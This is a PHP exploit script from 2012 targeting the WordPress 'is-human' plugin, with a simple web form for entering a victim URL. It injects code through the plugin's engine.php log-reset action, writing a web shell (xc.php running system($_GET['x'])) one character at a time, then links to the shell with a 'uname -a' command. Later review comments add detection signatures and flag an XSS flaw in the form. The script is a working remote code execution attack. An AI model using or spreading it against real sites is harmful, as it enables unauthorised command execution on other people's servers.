<?php
/**
 * @author BlueBoyz
 * @copyright 2012 Www.ExploreCrew.Org
 * @version 11.3.2
 * @tutorial Alternative Remote Code Execution Vulnerability
 * @for education purpose only
 */
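# <!-- start:function grabing -->
/**
 * Thin cURL wrapper used for every outbound request in this script.
 *
 * One request is issued with the given method; cookies are read from and
 * persisted to cookie.txt next to this file, redirects are followed, and a
 * fixed Firefox-style User-Agent plus an Accept-Language header are sent.
 * The handle is released before the function returns (previously the
 * curl_close() call sat after the return statement and never ran, so every
 * call leaked a cURL handle).
 *
 * Note: $languagge and $method carry defaults but precede required
 * parameters, so positional callers cannot actually omit them (PHP 8
 * deprecates this arrangement); the signature is kept unchanged because the
 * existing call site passes all four arguments.
 *
 * @param string $languagge value placed in the Accept-Language header
 * @param string $method    'POST', 'GET' or 'UPLOAD'; any other value sets no URL
 * @param string $url       request URL (also sent as the Referer)
 * @param mixed  $data      POST fields for POST/UPLOAD, or a string appended verbatim to $url for GET
 * @return string|false response body, or false when curl_exec() fails
 */
function jHTTP($languagge='en_gb', $method='POST',$url,$data){
    $header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3');
    $cookieJar = dirname(__FILE__).'/cookie.txt';
    $ch = curl_init();
    if ($method === 'POST') {
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, TRUE);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    } elseif ($method === 'GET') {
        // $data is concatenated onto the URL without any encoding.
        curl_setopt($ch, CURLOPT_URL, $url.''.$data);
    } elseif ($method === 'UPLOAD') {
        // No CURLOPT_POST here: only POSTFIELDS is set for this method.
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_REFERER, $url);
    // Same file serves as cookie source and cookie sink, so sessions persist across calls.
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookieJar);
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0');
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    // Capture the body first so the handle is closed on every path.
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}
# <!-- end:function grabing -->
if(isset($_POST['exp'])){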
# NOTE(review): this block issues one GET request per array entry to the
# is-human plugin's engine.php; each entry is a PHP snippet that appends a
# character or short string to xc.php in that plugin directory. From a
# defender's side, repeated requests to
# /wp-content/plugins/is-human/engine.php?action=log-reset whose query string
# carries fopen/fwrite are the signature to alert on, and the artifact to look
# for on disk is wp-content/plugins/is-human/xc.php.
# take the victim link from the form, then append the bug + the [xcrew] prefix code.
$victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error';
# build the commands that write the file xc.php with the string <?php system($_GET['x']);
$exploit = array (
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)", // writes = <
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// writes = ?
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)", // writes = php
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)", // writes whitespace (chr(13) is a carriage return)
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)", // writes system
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)", // writes (
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)", // writes $
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)", // writes _GET
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)", // writes [
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // writes '
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)", // writes x
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)", // writes '
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)", // writes ]
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)", // writes )
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // writes ;
// all of them joined together become <?php system($_GET['x']);
);
# loop over the array above
for($i=0;$i<count($exploit);$i++){
# swap the [xcrew] prefix for the current array entry
$link = str_replace('[xcrew]',$exploit[$i],$victim);
# the assignment inside the argument list only passes 'en_gb' as the first argument
jHTTP($languagge='en_gb', 'GET',$link,'');
}
# NOTE(review): $_POST['victim'] is concatenated into HTML without escaping and
# echoed near the end of this file, so this form is itself open to reflected
# XSS; a real handler would pass it through htmlspecialchars() with ENT_QUOTES
# before building the link.
$info = '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>';
}
# build the HTML form
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<meta name="author" content="BlueBoyz" />
<title>Exploit IS Human</title>
</head>
<body>
<form method="post" action="" >
<input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br />
<input type="submit" name="exp" />
</form>
<?php echo @$info ?></body>
</html>